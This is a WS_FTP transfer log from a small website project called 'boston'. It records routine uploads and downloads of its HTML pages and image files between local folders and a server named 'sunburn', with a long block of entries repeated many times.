10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
